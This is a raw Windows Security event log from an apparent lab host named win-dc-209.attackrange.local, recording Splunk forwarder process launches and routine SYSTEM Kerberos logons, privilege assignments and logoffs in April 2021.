LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263948
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x179c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
04/19/2021 02:38:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263950
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x165c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
04/19/2021 02:38:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263951
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x144c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
04/19/2021 02:38:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263952
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xfa4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 02:38:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263954
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x114c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 02:38:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263953
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 02:38:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263957
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78E435
Logon Type: 3
04/19/2021 02:38:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263956
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x78E435
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51697
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:38:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263955
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78E435
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263968
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78E8E3
Logon Type: 3
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263967
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78E9D1
Logon Type: 3
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263966
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78EA19
Logon Type: 3
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263965
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x78EAD2
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51704
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263964
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78EAD2
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263963
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x78EA19
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 51701
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263962
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78EA19
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263961
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x78E9D1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263960
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78E9D1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263959
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x78E8E3
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51700
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263958
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78E8E3
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:39:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263970
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16e4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:39:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263969
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19d8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
04/19/2021 02:39:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263971
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a34
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
04/19/2021 02:39:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263972
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
04/19/2021 02:39:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263973
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 02:39:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263975
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xeb8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 02:39:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263974
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 02:39:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263976
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78EAD2
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:39:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263979
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x792329
Logon Type: 3
04/19/2021 02:39:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263978
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x792329
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51715
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:39:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263977
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x792329
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:40:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263981
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1678
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
04/19/2021 02:40:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263980
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14a4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
04/19/2021 02:40:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263982
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x8f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
04/19/2021 02:40:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263983
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1750
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
04/19/2021 02:40:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263984
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aa0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
